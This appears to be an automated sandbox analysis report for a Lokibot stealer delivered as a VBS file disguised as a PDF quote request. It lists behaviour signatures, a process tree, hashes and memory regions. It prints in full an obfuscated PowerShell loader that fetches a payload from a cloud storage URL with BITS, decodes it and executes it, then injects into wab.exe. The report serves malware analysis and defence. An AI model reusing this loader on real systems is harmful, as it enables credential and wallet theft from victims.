Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/03/2024, 17:07

General

  • Target

    Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs

  • Size

    20KB

  • MD5

    6c172c78edfa9cf3fbcee9e6417b4ec0

  • SHA1

    56d554a6cfae0cbee45a32ac9e7f261c910cd046

  • SHA256

    18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad

  • SHA512

    881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27

  • SSDEEP

    384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M

Malware Config

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3484
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2948
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4956
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:4216
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:2568
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Accesses Microsoft Outlook profiles
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:1088
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3908

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            3KB

            MD5

            9f0edd78a6aaca110c79013771d6001a

            SHA1

            5b96b41d1881dab66b4379cf0ada08ff0bbbd834

            SHA256

            611b8b6bca22e3a5244ddfbd691a0ae85134682397b60bf0cf3b0a7eb7fa8eae

            SHA512

            4bb07b481f5dbba051aa97b08c107b2cef894d2d672bcbbef95159d31cf776663db1026f0cccbe2ef3532841b83a48966a70a15576cabdb4821a8d6cb5fd9608

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            4KB

            MD5

            5c70ac32cd66791376b62c77311b502f

            SHA1

            de76395b2e4dc43d7de2c2b16d6c2fc708877379

            SHA256

            d76f34448ff1872b89bf50073022ff97fe0727b0edf8fe2532c5a62a99fa2cdf

            SHA512

            1467790a710fef3c26ba806e225cea1183ab85ece56c9a2e29c3490bde7888d5bd6fd1630108b99e379f0f23f29e0ba1d78e1dcedb5e6d73c73e8e09e4cabfa2

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            1KB

            MD5

            bd20ec18e46ec8314987aaada98f10fd

            SHA1

            8f51d5e778fc71bafdde641b75f398e39eecc62a

            SHA256

            64cbcd3e70eb4b7f448c05342a3a7c9ce1dcf240d9d04b32a48fda0373c221f9

            SHA512

            8a5002870a7b1169ba2ea8395a5c5ca395967594f196150c7bc9a2734ebcd89d8e2d6907b4358d404d431950bc87c5baba150c2448e3a260ed753b9e25f5b170

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            1KB

            MD5

            8f730c551500d56834bbf653c4967bfa

            SHA1

            743ced63ecf36448118864ebb17326215c39a47c

            SHA256

            70054f0aa395f386ba7751641347c2cb5e5f730769139691324ede08b5e0792f

            SHA512

            7f74b3322094bad9ad169608679c299f91c4b0cafcd503d21994b8a3b1027db1994997aa0ddcee56e70a4169434c473dd3cbd7ebbc485b37de465f7799bf9ade

          • C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

            Filesize

            3KB

            MD5

            3a77b94591bc1515432be570e46a0e8c

            SHA1

            4abaf647d3adcd56bc7247e272b7d80dfba74dcf

            SHA256

            904c10020cd2ed4c085f02c125fa373f693454dce4bc7015a0bca543cdf9459d

            SHA512

            9bf2e8a1638283ffc19e75d4f669e734ca90de46890c38a3e28390a2ac1b8bc1cdc55c18236f5728d962dacd4fe079e31ebdc22d1f69dc8267fc6d7d7d699867

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wr3xaxqx.gts.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1088-344-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-348-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-320-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-318-0x0000000077A28000-0x0000000077A29000-memory.dmp

            Filesize

            4KB

          • memory/1088-319-0x00000000779A1000-0x0000000077AC1000-memory.dmp

            Filesize

            1.1MB

          • memory/1088-335-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-337-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-358-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-359-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-357-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-356-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-338-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-336-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-355-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-354-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-353-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-352-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-339-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-341-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-340-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-351-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-342-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-350-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-347-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-346-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-333-0x00000000012C0000-0x0000000005698000-memory.dmp

            Filesize

            67.8MB

          • memory/1088-345-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-334-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/1088-343-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/3484-301-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-274-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-293-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-294-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-280-0x00007FFA052F0000-0x00007FFA05DB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3484-268-0x000001B869340000-0x000001B869362000-memory.dmp

            Filesize

            136KB

          • memory/3484-277-0x000001B8698A0000-0x000001B8698B4000-memory.dmp

            Filesize

            80KB

          • memory/3484-276-0x000001B869850000-0x000001B869876000-memory.dmp

            Filesize

            152KB

          • memory/3484-272-0x00007FFA052F0000-0x00007FFA05DB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3484-273-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/3484-275-0x000001B869290000-0x000001B8692A0000-memory.dmp

            Filesize

            64KB

          • memory/4956-283-0x0000000005390000-0x00000000059B8000-memory.dmp

            Filesize

            6.2MB

          • memory/4956-317-0x00000000779A1000-0x0000000077AC1000-memory.dmp

            Filesize

            1.1MB

          • memory/4956-316-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-313-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-314-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-312-0x0000000008C60000-0x000000000D038000-memory.dmp

            Filesize

            67.8MB

          • memory/4956-311-0x0000000007A30000-0x0000000007A31000-memory.dmp

            Filesize

            4KB

          • memory/4956-309-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-310-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-308-0x0000000007770000-0x0000000007784000-memory.dmp

            Filesize

            80KB

          • memory/4956-307-0x0000000007710000-0x0000000007732000-memory.dmp

            Filesize

            136KB

          • memory/4956-306-0x00000000086B0000-0x0000000008C54000-memory.dmp

            Filesize

            5.6MB

          • memory/4956-304-0x00000000074F0000-0x0000000007586000-memory.dmp

            Filesize

            600KB

          • memory/4956-305-0x00000000074A0000-0x00000000074C2000-memory.dmp

            Filesize

            136KB

          • memory/4956-303-0x0000000007420000-0x000000000743A000-memory.dmp

            Filesize

            104KB

          • memory/4956-349-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-302-0x0000000007A80000-0x00000000080FA000-memory.dmp

            Filesize

            6.5MB

          • memory/4956-300-0x0000000006390000-0x00000000063DC000-memory.dmp

            Filesize

            304KB

          • memory/4956-299-0x0000000006300000-0x000000000631E000-memory.dmp

            Filesize

            120KB

          • memory/4956-292-0x0000000005C10000-0x0000000005F64000-memory.dmp

            Filesize

            3.3MB

          • memory/4956-286-0x0000000005AA0000-0x0000000005B06000-memory.dmp

            Filesize

            408KB

